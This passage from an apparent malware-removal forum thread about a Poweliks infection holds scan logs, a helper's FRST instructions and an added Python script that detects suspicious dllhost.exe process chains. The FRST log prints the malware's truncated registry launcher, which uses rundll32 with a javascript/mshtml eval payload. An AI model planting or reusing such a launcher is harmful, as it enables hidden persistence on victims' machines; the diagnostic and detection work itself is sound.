2014-07-22 02:52:26 613888 ----a-w- c:\windows\system32\WUDFx.dll
2014-07-22 02:52:26 38912 ----a-w- c:\windows\system32\WUDFCoinstaller.dll
2014-07-22 02:52:26 196608 ----a-w- c:\windows\system32\WUDFHost.exe
2014-07-22 02:52:26 172032 ----a-w- c:\windows\system32\WUDFPlatform.dll
2014-07-22 02:52:26 155136 ----a-w- c:\windows\system32\drivers\WUDFRd.sys
2014-07-22 02:49:58 347136 ----a-w- c:\windows\system32\RMActivate_ssp.exe
2014-07-22 02:49:58 332288 ----a-w- c:\windows\system32\msdrm.dll
2014-07-22 02:49:58 152576 ----a-w- c:\windows\system32\secproc_ssp_isv.dll
2014-07-22 02:49:58 152064 ----a-w- c:\windows\system32\secproc_ssp.dll
2014-07-22 02:49:57 526336 ----a-w- c:\windows\system32\RMActivate_isv.exe
2014-07-22 02:49:57 518144 ----a-w- c:\windows\system32\RMActivate.exe
2014-07-22 02:49:57 471552 ----a-w- c:\windows\system32\secproc_isv.dll
2014-07-22 02:49:57 471552 ----a-w- c:\windows\system32\secproc.dll
2014-07-22 02:49:57 346624 ----a-w- c:\windows\system32\RMActivate_ssp_isv.exe
2014-07-22 00:56:58 245760 ----a-w- c:\windows\system32\uninst_saver.exe
2014-07-20 18:44:45 83304 ----a-w- c:\windows\system32\drivers\ksapi.sys
2014-07-20 18:44:44 27240 ----a-w- c:\windows\system32\drivers\KavBootC.sys
2014-07-14 13:22:28 97648 ----a-w- c:\windows\system32\drivers\avgntflt.sys
2014-07-02 16:07:08 358984 ----a-w- c:\windows\system32\drivers\Lsmon.sys
2014-07-02 16:07:08 358984 ----a-w- c:\windows\system32\drivers\Drmon.sys
.
============= FINISH: 13:40:03.96 ===============
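The parent chain traced above is itself a usable detection: a COM surrogate (dllhost.exe) is normally started by the DcomLaunch svchost directly, not by a PowerShell process. The script below is an added example, not code from the post or from any tool named in it. It walks a constructed process snapshot (made-up PIDs arranged in the shape of the Process Explorer tree described in the post) and flags every dllhost.exe whose ancestry, after skipping self-spawned dllhost.exe copies, is powershell.exe <- rundll32.exe <- svchost.exe. It also counts how many dllhost.exe children each flagged copy has, which picks out the copy that is fanning out.

```python
"""Flag dllhost.exe processes hanging off the
svchost.exe (DcomLaunch) -> rundll32.exe -> powershell.exe chain,
given a process snapshot of (pid, ppid, image, cmdline) records."""
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str = ""


# Parent chain to match, nearest ancestor first. A legitimate COM surrogate
# is launched by the DcomLaunch svchost itself, never through PowerShell.
SUSPECT_CHAIN = ("powershell.exe", "rundll32.exe", "svchost.exe")


def ancestry(pid, by_pid):
    """Return [proc, parent, grandparent, ...]. Stops at a missing parent
    (e.g. userinit.exe, which exits after starting explorer.exe) or at a
    cycle, which PID reuse can produce in a stale snapshot."""
    chain, seen = [], set()
    cur = by_pid.get(pid)
    while cur is not None and cur.pid not in seen:
        seen.add(cur.pid)
        chain.append(cur)
        cur = by_pid.get(cur.ppid)
    return chain


def is_suspect_dllhost(proc, by_pid):
    """True if proc is dllhost.exe and, after skipping any dllhost.exe
    ancestors (self-replicated copies), its parents are exactly
    powershell.exe <- rundll32.exe <- svchost.exe."""
    if proc.image.lower() != "dllhost.exe":
        return False
    parents = [p.image.lower() for p in ancestry(proc.pid, by_pid)[1:]]
    while parents and parents[0] == "dllhost.exe":
        parents.pop(0)
    return tuple(parents[: len(SUSPECT_CHAIN)]) == SUSPECT_CHAIN


def flag_dllhosts(procs):
    """PIDs of dllhost.exe instances matching the chain, ascending."""
    by_pid = {p.pid: p for p in procs}
    return sorted(p.pid for p in procs if is_suspect_dllhost(p, by_pid))


def replicators(procs):
    """For each flagged dllhost.exe, how many dllhost.exe children it has.
    The busiest one is the copy that is fanning out."""
    flagged = set(flag_dllhosts(procs))
    counts = Counter(
        p.ppid for p in procs
        if p.image.lower() == "dllhost.exe" and p.ppid in flagged
    )
    return {pid: counts.get(pid, 0) for pid in flagged}


def describe(pid, procs):
    """Human-readable lineage, child first."""
    by_pid = {p.pid: p for p in procs}
    return " <- ".join(f"{p.image}({p.pid})" for p in ancestry(pid, by_pid))


# Constructed snapshot (assumed PIDs, not taken from the post) in the shape
# of the tree described above. explorer.exe's parent (pid 1050) is absent.
SNAPSHOT = [
    Proc(4, 0, "System"),
    Proc(560, 4, "smss.exe"),
    Proc(620, 560, "wininit.exe"),
    Proc(700, 620, "services.exe"),
    Proc(820, 700, "svchost.exe", "svchost.exe -k DcomLaunch"),
    Proc(900, 700, "svchost.exe", "svchost.exe -k netsvcs"),
    Proc(2000, 1050, "explorer.exe"),
    Proc(2100, 2000, "chrome.exe"),
    Proc(1200, 820, "rundll32.exe"),
    Proc(1300, 1200, "powershell.exe"),
    Proc(1400, 1300, "dllhost.exe"),   # first dllhost, spawned by PowerShell
    Proc(1410, 1400, "dllhost.exe"),   # second copy, which then fans out
    Proc(1411, 1410, "dllhost.exe"),
    Proc(1412, 1410, "dllhost.exe"),
    Proc(1413, 1410, "dllhost.exe"),
    # Ordinary COM surrogate started by DcomLaunch directly: must not be flagged.
    Proc(1600, 820, "dllhost.exe",
         "dllhost.exe /Processid:{00000000-0000-0000-0000-000000000000}"),
]

if __name__ == "__main__":
    for pid in flag_dllhosts(SNAPSHOT):
        print(describe(pid, SNAPSHOT))
    print("dllhost.exe children per flagged copy:", replicators(SNAPSHOT))
```

On a live Windows host the snapshot would come from Process Explorer, from `Get-CimInstance Win32_Process` (ProcessId, ParentProcessId, Name, CommandLine) or from Sysmon event ID 1 records. The parent walk deliberately tolerates a missing parent: parent PIDs are recorded at creation time, so once the parent exits the number may be absent or reassigned to an unrelated process.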
 

 

 



#2 aharonov (Malware Response Team)

Posted 15 September 2014 - 04:06 PM

Hello,

thank you for your detailed description. This clearly is Poweliks - an infection that we know well.
Please run a FRST scan:


Please download Farbar Recovery Scan Tool and save it to your Desktop.
(If you are not sure which version (32-/64-bit) applies to your system, download and try to start both of them as just the right one will run.)
  • Start FRST with administrator privileges.
  • Make sure the option Addition.txt is checked and press the Scan button.
  • When finished, FRST will produce two logs (FRST.txt and Addition.txt) in the same directory the tool was run from.
  • Please copy and paste these logs in your next reply.


#3 firzenj (Topic Starter)

Posted 15 September 2014 - 04:24 PM

Thanks  for your patience!

 

You can call me Jay, and I realize that I might have done a bunch of stupid actions before asking for your help. I hope unadvised scanning will not cause further chaos for you....

 

And here are the logs:

 

FRST.txt:

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 12-09-2014
Ran by THINK (administrator) on THINK-PC on 15-09-2014 17:13:48
Running from C:\Users\THINK\Desktop
Platform: Microsoft® Windows Vista™ Business  Service Pack 2 (X86) OS Language: 中文(简体,中国)
Internet Explorer Version 9
Boot Mode: Normal
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Lenovo.) C:\Windows\System32\ibmpmsvc.exe
(AMD) C:\Windows\System32\atiesrxx.exe
(Microsoft Corporation) C:\Windows\System32\SLsvc.exe
(AMD) C:\Windows\System32\atieclxx.exe
() Q:\Program Files\Keniu\ConewRsc\conewrsc.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Avira Operations GmbH & Co. KG) C:\Program Files\Avira\AntiVir Desktop\sched.exe
(IObit) C:\Program Files\IObit\IObit Malware Fighter\IMFsrv.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Broadcom Corporation.) C:\Program Files\ThinkPad\Bluetooth Software\btwdins.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework\v3.0\Windows Communication Foundation\SMSvcHost.exe
(O&O Software GmbH) C:\Program Files\OO Software\Defrag\oodag.exe
(Pharos Systems International) C:\Program Files\PharosSystems\Core\CTskMstr.exe
(Lenovo) C:\Program Files\ThinkPad\Utilities\PWMDBSVC.exe
(Intel® Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Lenovo) C:\Program Files\Lenovo\Client Security Solution\tvttcsd.exe
() C:\Program Files\Lenovo\Rescue and Recovery\rrpservice.exe
(Lenovo Group Limited) C:\Program Files\Common Files\Lenovo\Scheduler\tvtsched.exe
(Conexant Systems, Inc.) C:\Windows\System32\drivers\XAudio.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe
(Avira Operations GmbH & Co. KG) C:\Program Files\Avira\AntiVir Desktop\avwebgrd.exe
(Intel Corporation) C:\Windows\System32\igfxsrvc.exe
(Avira Operations GmbH & Co. KG) C:\Program Files\Avira\AntiVir Desktop\avgnt.exe
(Broadcom Corporation.) C:\Program Files\ThinkPad\Bluetooth Software\BTTray.exe
(Microsoft Corporation) C:\Windows\System32\conime.exe
(Lenovo Group Limited) C:\Program Files\Common Files\Lenovo\tvt_reg_monitor_svc.exe
(Lenovo Group Limited) C:\Program Files\Lenovo\Rescue and Recovery\rrservice.exe
(Sysinternals - www.sysinternals.com) C:\Users\THINK\Desktop\procexp_V15.40.0.0.4202571463.exe
(Sogou.com Inc.) Q:\Program Files\SogouInput\6.1.0.6700\SogouInput\Components\AddressSearch\1.0.0.1255\SGImeGuard.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Sogou.com Inc.) Q:\Program Files\SogouInput\6.1.0.6700\SogouInput\7.2.0.2991\SogouCloud.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbam.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Nullsoft, Inc.) Q:\Program Files\Winamp\winamp.exe
(Last.fm) Q:\Program Files\Last.fm\Last.fm Scrobbler.exe
(vista123.com) Q:\Program Files\VistaMaster\MemoryMaster.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Farbar) C:\Users\THINK\Desktop\FRST (1).exe
 
 
==================== Registry (Whitelisted) ==================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [avgnt] => C:\Program Files\Avira\AntiVir Desktop\avgnt.exe [751184 2014-07-23] (Avira Operations GmbH & Co. KG)
HKLM\...\Policies\Explorer: [EnableShellExecuteHooks] 1
HKLM\...\Policies\Explorer: [OldEnableShellExecuteHooks] 1
HKU\S-1-5-21-55330172-1766457534-1491637609-1000\...\Run: [Adobe Acrobat Synchronizer] => Q:\Program Files\Adobe.Acrobat.X.Pro\Acrobat\AdobeCollabSync.exe [1216416 2010-11-15] (Adobe Systems Incorporated)
HKU\S-1-5-21-55330172-1766457534-1491637609-1000\...\Run: [360sd] => Q:\Program Files\360\360sd\360sdrun.exe [832840 2014-05-27] (360.cn)
HKU\S-1-5-21-55330172-1766457534-1491637609-1000\...\Run: [HP Officejet Pro 8600 (NET)] => C:\Program Files\HP\HP Officejet Pro 8600\Bin\ScanToPCActivationApp.exe [1837672 2012-10-17] (Hewlett-Packard Co.)
HKU\S-1-5-21-55330172-1766457534-1491637609-1000\...\Run: [ctfmon] => C:\windows\system32\ctfmon.exe [8704 2006-11-02] (Microsoft Corporation)
HKU\S-1-5-21-55330172-1766457534-1491637609-1000\...\Policies\Explorer: [NolowDiskSpaceChecks] 1
HKU\S-1-5-21-55330172-1766457534-1491637609-1000\...\Policies\Explorer: [AlwaysShowClassicMenu] 0
HKU\S-1-5-21-55330172-1766457534-1491637609-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
HKU\S-1-5-21-55330172-1766457534-1491637609-500\...\Run: [LightScribe Control Panel] => C:\Program Files\Common Files\LightScribe\LightScribeControlPanel.exe [455968 2007-10-18] (Hewlett-Packard Company)
Lsa: [Notification Packages] scecli ACGina
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Bluetooth.lnk
ShortcutTarget: Bluetooth.lnk -> C:\Program Files\ThinkPad\Bluetooth Software\BTTray.exe (Broadcom Corporation.)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\STK02N 2.3 PNP Monitor.lnk
ShortcutTarget: STK02N 2.3 PNP Monitor.lnk -> C:\Windows\STK02N\STK02NM.exe (Syntek Ltd.)
Startup: C:\Users\THINK\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\监视墨水警告 - HP Officejet Pro 8600 (网络).lnk
ShortcutTarget: 监视墨水警告 - HP Officejet Pro 8600 (网络).lnk -> C:\Program Files\HP\HP Officejet Pro 8600\Bin\HPStatusBL.dll (Hewlett-Packard Co.)
ShellIconOverlayIdentifiers: 360FileGuardAntiDel -> {130DA40A-D640-44D7-9CC6-FAA1CD6B3DEA} => Q:\Program Files\360\360sd\ShellIco.dll (360.cn)
ShellIconOverlayIdentifiers: AAADesktopTips -> {4562B511-62E9-4533-B7B2-56A8BB10B482} => C:\Users\Public\Thunder Network\KanKan\reghelper\xappex.1.1.1.73.(426).dll (深圳市迅雷网络技术有限公司)
ShellIconOverlayIdentifiers: DropboxExt1 -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\THINK\AppData\Roaming\Dropbox\bin\DropboxExt.19.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: DropboxExt2 -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\THINK\AppData\Roaming\Dropbox\bin\DropboxExt.19.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: DropboxExt3 -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\THINK\AppData\Roaming\Dropbox\bin\DropboxExt.19.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: DropboxExt4 -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => C:\Users\THINK\AppData\Roaming\Dropbox\bin\DropboxExt.19.dll (Dropbox, Inc.)
ShellIconOverlayIdentifiers: QVODOverlayIcon -> {237A913F-9059-4E00-8C29-624C3C015013} => C:\Program Files\QMovie\QVODShellIcon.dll (Shenzhen Qvod Technology Co.,Ltd)
BootExecute: autocheck autochk * OODBS
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.hao123.com/?tn=91192494_hao_pg
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = http://www.lenovo.com/welcome/thinkpad
HKCU\Software\Microsoft\Internet Explorer\Main,Start Pages = http://www.baidu.com/index.php?tn=antiarp_pg
HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.hao123.com/?tn=91192494_hao_pg
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Start Pages = http://www.baidu.com/index.php?tn=antiarp_pg
SearchScopes: HKLM - DefaultScope {0E7B197B-A3DE-4FD4-A19A-1EECF791D16F} URL = http://www.baidu.com/s?tn=msvista_dg&ch=6&ie=utf-8&word={searchTerms}
SearchScopes: HKLM - PrevScope {0E7B197B-A3DE-4FD4-A19A-1EECF791D16F}
SearchScopes: HKLM - {0E7B197B-A3DE-4FD4-A19A-1EECF791D16F} URL = http://www.baidu.com/s?tn=msvista_dg&ch=6&ie=utf-8&word={searchTerms}
SearchScopes: HKCU - DefaultScope {B8E20CD7-BAC2-4820-9AA6-1060B3AF25E2} URL = http://www.baidu.com/s?tn=msvista_dg&ch=6&ie=utf-8&word={searchTerms}
SearchScopes: HKCU - PrevScope {B8E20CD7-BAC2-4820-9AA6-1060B3AF25E2}
SearchScopes: HKCU - {0E7B197B-A3DE-4FD4-A19A-1EECF791D16F} URL = http://www.baidu.com/s?tn=msvista_dg&ch=6&ie=utf-8&word={searchTerms}
SearchScopes: HKCU - {11111111-1111-1111-1111-111111111111} URL = http://www.baidu.com/s?tn=msvista_dg&ch=6&ie=utf-8&word={searchTerms}
SearchScopes: HKCU - {24588FA4-10F1-41D7-B19D-6E22361E47FA} URL = http://www.baidu.com/s?tn=msvista_dg&ch=6&ie=utf-8&word={searchTerms}
SearchScopes: HKCU - {B8E20CD7-BAC2-4820-9AA6-1060B3AF25E2} URL = http://www.baidu.com/s?tn=msvista_dg&ch=6&ie=utf-8&word={searchTerms}
SearchScopes: HKCU - {DAFC3089-C966-4796-BF72-E6BB9C4BB8E5} URL = http://www.google.cn/search?q={searchTerms}&client=aff-6655&hl=zh-CN&channel=vm
SearchScopes: HKCU - {E19077BB-3ADE-4DF4-1A9A-C1EDEF11679F} URL = http://www.sogou.com/sogou?query={searchTerms}&ie=utf8&pid=sogou-clse-c07d4fe1bad8cc10
BHO: QQDownload IE Left Helper -> {00000000-12C9-4305-82F9-43058F20E8D2} -> Q:\Program Files\Tencent\QQDownload\QQIEHelper01.dll (Tencent Technology (Shenzhen) Company Limited)
BHO: IE2EMBHO Class -> {0A0DDBD3-6641-40B9-873F-BBDD26D6C14E} -> Q:\Program Files\easyMule\modules\IE2EM.dll (VeryCD.com)
BHO: 360sdbho Class -> {0F4BF955-A127-41B7-A998-369904AA2578} -> Q:\Program Files\360\360sd\360sdbho.dll (360.cn)
BHO: ExplorerWnd Helper -> {10921475-03CE-4E04-90CE-E2E7EF20C814} -> q:\Program Files\IObit\IObit Uninstaller\UninstallExplorer32.dll (IObit)
BHO: Bing Bar Helper -> {1dad3af3-ef2f-4f64-ac4b-11789189fcb6} -> C:\Program Files\Microsoft\BingBar\7.2.241.0\BingExt.dll (Microsoft Corporation。)
BHO: WebDetectorBHO Class -> {43BEAFD9-E005-483D-A367-146BA6C8A32E} -> q:\Program Files\Tudou\飞速Tudou\tudouDetector.dll (土豆网)
BHO: No Name -> {5C255C8A-E604-49b4-9D64-90988571CECB} ->  No File
BHO: xiamistart Class -> {658D2C4F-158A-46FB-8C96-B1C8F56DBBE9} -> H:\shark\XIAMIP~1.DLL (XiaMi music)
BHO: BOC ProcessProtect Class -> {776B71E2-B4CC-4C94-BC7C-09103AA690B6} -> C:\Windows\system32\ProcessProtection.dll (www.ISRA.org.cn)
BHO: 迅雷下载支持 -> {889D2FEB-5411-4565-8998-1DD2C5261283} -> Q:\Program Files\Thunder Network\Thunder\BHO\XunleiBHO7.99.9.172.dll (深圳市迅雷网络技术有限公司)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corporation)
BHO: No Name -> {B164E929-A1B6-4A06-B104-2CD0E90A88FF} ->  No File
BHO: Advanced SystemCare Browser Protection -> {BA0C978D-D909-49B6-AFE2-8BDE245DC7E6} -> C:\Program Files\IObit\Surfing Protection\BrowerProtect\ASCPlugin_Protection.dll (IObit)
BHO: AccountProtectBHO Class -> {DDD362CF-523B-4BC9-8FDC-58F93B6BC945} -> C:\Users\THINK\AppData\Roaming\Tencent\QQ\QQAntiPhishing\AccountProtect.dll (Tencent)
BHO: 迅雷下载支持组件 -> {DE05CF4A-7B0A-4775-B5E5-396244938679} -> Q:\Program Files\Thunder Network\Thunder\Thunder BHO Platform\np_tdieplat.dll (深圳市迅雷网络技术有限公司)
BHO: BHOImpl Class -> {E1499FE7-129D-4B6E-B681-DDF21E14172C} -> C:\Users\THINK\Documents\iTools\Plugin\iToolsBHO.dll (iTools.hk)
Toolbar: HKLM - Bing Bar - {eec0f710-38b5-4aba-99bf-ec87564a4e13} - C:\Program Files\Microsoft\BingBar\7.2.241.0\BingExt.dll (Microsoft Corporation。)
Toolbar: HKCU - No Name - {BDAD1DAD-C946-4A17-ADC1-64B5B4FF55D0} -  No File
Toolbar: HKCU - No Name - {21FA44EF-376D-4D53-9B0F-8A89D3229068} -  No File
DPF: {02BCC737-B171-4746-94C9-0D8A0B2C0089} http://office.microsoft.com/sites/production/ieawsdc32.cab
DPF: {2B24B8F5-8FAD-4933-8E6C-3CAAEEA4D217} http://8021x.noc.stonybrook.edu/tools/xc_loader_activex.ocx
DPF: {45D2E7C0-B894-43CE-B64E-F210DBEC8C94} http://www.activextest.com/activex/ActiveXScanner.CAB
DPF: {9732FB42-C321-11D1-836F-00A0C993F125} http://mheller.com/mhLbl.cab
DPF: {9E2CD2C3-4DDA-4473-B904-B8E6D0DBAB86} http://think.lenovo.com.cn/ThinkEDriver/cab/npdueng.cab
DPF: {BBF51028-5890-4817-A2C4-5F3CFCEBD7EF} http://8021x.noc.stonybrook.edu/tools/xc_loader_activex.ocx
Handler: KuGoo - {6AC4FBC7-AA38-45EC-9634-D6D20B679EFC} - Q:\Program Files\KuGou7\KuGoo3DownXControl.ocx (广州酷狗计算机科技有限公司)
Handler: KuGoo3 - {6AC4FBC7-AA38-45EC-9634-D6D20B679EFC} - Q:\Program Files\KuGou7\KuGoo3DownXControl.ocx (广州酷狗计算机科技有限公司)
Handler: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll (Microsoft Corporation)
Handler: ms-itss - No CLSID Value - 
Handler: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll (Microsoft Corporation)
Handler: sacore - No CLSID Value - 
ShellExecuteHooks:  - {AEB6717E-7E19-11d0-97EE-00C04FD91972} -  No File [ ]
Winsock: Catalog5 08 C:\Program Files\Bonjour\mdnsNSP.dll [121704] (Apple Inc.)
Tcpip\Parameters: [DhcpNameServer] 167.206.112.138 167.206.7.4 167.206.3.168
 
FireFox:
========
FF Plugin: @56.com/iCan -> q:\Program Files\iCan3\npiCan3plugin.dll (www.56.com)
FF Plugin: @adobe.com/FlashPlayer -> C:\windows\system32\Macromed\Flash\NPSWF32_14_0_0_145.dll ()
FF Plugin: @alipay.com/npaliedit -> C:\windows\system32\aliedit\3.8.0.0\npaliedit.dll No File
FF Plugin: @Apple.com/iTunes,version=1.0 -> Q:\Program Files\iTunes\Mozilla Plugins\npitunes.dll ()
FF Plugin: @baidu.com/BaiduRJDownloaderPlugin -> C:\Users\THINK\AppData\Roaming\baidu\BaiduRJDownloader\1.3.0.3\npBDSoftHelperPlug.dll (百度在线网络技术(北京)有限公司)
FF Plugin: @baidu.com/npxbdsetup -> C:\windows\Downloaded Program Files\375291\npxbdsetup.dll No File
FF Plugin: @baidu.com/YunWebDetectPlugin -> Q:\Program Files\BaiduYunGuanjia\npYunWebDetect.dll (Baidu.com, Inc.)
FF Plugin: @google.com/npPicasa3,version=3.0.0 -> q:\Program Files\Google\Picasa3\npPicasa3.dll (Google, Inc.)
FF Plugin: @IObit.com/np_Asc_Plugin -> C:\Program Files\IObit\Surfing Protection\BrowerProtect\np_Asc_plugin.dll (IObit)
FF Plugin: @iqiyi.com/npclient -> Q:\IQIYI Video\PStyle\npclient.dll No File
FF Plugin: @itools.hk/npiTools, version=1.0.0 -> C:\Users\THINK\Documents\iTools\Plugin\npiTools.dll ()
FF Plugin: @lenovo.com/dueng,version=2.0 -> C:\Windows\system32\lenovo\update\npdueng.dll (Lenovo)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.20125.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeLive,version=1.3 -> C:\Program Files\Microsoft\Office Live\npOLW.dll (Microsoft Corp.)
FF Plugin: @microsoft.com/WPF,version=3.5 -> C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin: @pptv.com/plugin -> C:\Program Files\Internet Explorer\PPLite\plugin\1.0.1.1058\npplugin2.dll (PPLive Corporation)
FF Plugin: @qq.com/npqscall -> C:\Program Files\Common Files\Tencent\Npchrome\npactivex.dll (Tencent)
FF Plugin: @qq.com/QQDownloadPlugin -> Q:\Program Files\Tencent\QQDownload\Browser\769\npXFPlugin.dll (Tencent Technology (Shenzhen) Company Limited)
FF Plugin: @qq.com/QQPhotoDrawEx -> C:\Program Files\Tencent\Qzone\Ver_247.311\npQQPhotoDrawEx.dll ()
FF Plugin: @qq.com/QzoneMusic -> C:\Program Files\Tencent\QQMusic\QzoneMusic\npQzoneMusic.dll (Tencent)
FF Plugin: @qq.com/TXSSO -> C:\Program Files\Common Files\Tencent\TXSSO\1.2.2.45\Bin\npSSOAxCtrlForPTLogin.dll (Tencent)
FF Plugin: @renren.com/nprralbum -> C:\Program Files\Common Files\renren\rralbum\nprralbum.dll (renren inc)
FF Plugin: @tencent.com/npQQMailWebKit,version=1.0.0.1 -> C:\Program Files\QQMailPlugin\npQQMailWebKit.dll (Tencent)
FF Plugin: @tencent.com/nptxftnWebKit,version=1.0.0.1 -> C:\Program Files\QQMailPlugin\nptxftnWebKit.dll (Tencent Technology (Shenzhen) Company Limited)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @xunlei.com/DapCtrlPlugin -> C:\Program Files\Common Files\Thunder Network\KanKan\npDapCtrlFirefox.2.0.5901.12.(358).dll (ShenZhen Thunder Networking Technologies Ltd.)
FF Plugin: @xunlei.com/KKVA -> C:\Program Files\Common Files\Thunder Network\KanKan\npKKVA.1.0.0.3.(328).dll (ShenZhen Thunder Networking Technologies Ltd.)
FF Plugin: @xunlei.com/npaplayer -> C:\Users\Public\Thunder Network\APlayer\codecs\npaplayer.dll No File
FF Plugin: @xunlei.com/npxluser -> C:\Program Files\Common Files\Thunder Network\UserAgent\npxluser2.0.2.3.dll (Thunder Networking Technologies,LTD)
FF Plugin: @xunlei.com/npxunlei;version=1.0.0.2 -> Q:\Program Files\Thunder Network\Thunder\Data\npxunlei1.0.0.2.dll ( )
FF Plugin: Adobe Reader -> Q:\Program Files\Adobe\Reader 10.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: @360.cn/360MMPlugin -> Q:\Program Files\360\360safe\mobilemgr\np360MMPlugIn.dll (360.cn)
FF Plugin HKCU: @alibaba.com/npwangwang;version=1.0 -> Q:\Program Files\AliWangWang\7.00.07C\npwangwang.dll ( )
FF Plugin HKCU: @qvod.com/QvodInsert -> q:\QvodPlayer\npQvodInsert.dll No File
FF Plugin HKCU: @renren.com/nprralbum -> C:\Program Files\Common Files\renren\rralbum\nprralbum.dll (renren inc)
FF Plugin HKCU: @talk.google.com/GoogleTalkPlugin -> C:\Users\THINK\AppData\Roaming\Mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin HKCU: @talk.google.com/O1DPlugin -> C:\Users\THINK\AppData\Roaming\Mozilla\plugins\npo1d.dll (Google)
FF Plugin HKCU: @tools.google.com/Google Update;version=3 -> C:\Users\THINK\AppData\Local\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKCU: @tools.google.com/Google Update;version=9 -> C:\Users\THINK\AppData\Local\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin HKCU: @xunlei.com/npxluser -> C:\Program Files\Common Files\Thunder Network\UserAgent\npxluser2.0.2.3.dll (Thunder Networking Technologies,LTD)
FF Plugin HKCU: @xunlei.com/npxunlei;version=1.0.0.2 -> Q:\Program Files\Thunder Network\Thunder\Data\npxunlei1.0.0.2.dll ( )
FF Plugin ProgramFiles/Appdata: C:\Users\THINK\AppData\Roaming\mozilla\plugins\npgoogletalk.dll (Google)
FF Plugin ProgramFiles/Appdata: C:\Users\THINK\AppData\Roaming\mozilla\plugins\npo1d.dll (Google)
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF Extension: Microsoft .NET Framework Assistant - C:\Windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension [2009-09-15]
FF HKCU\...\Firefox\Extensions: [dict@www.youdao.com] - Q:\Program Files\Youdao\Dict4\\res\extensions\firefox
FF Extension: Youdao Word Capturer - Q:\Program Files\Youdao\Dict4\\res\extensions\firefox [2011-09-28]
 
Chrome: 
=======
CHR HomePage: Default -> hxxp://www.google.com/
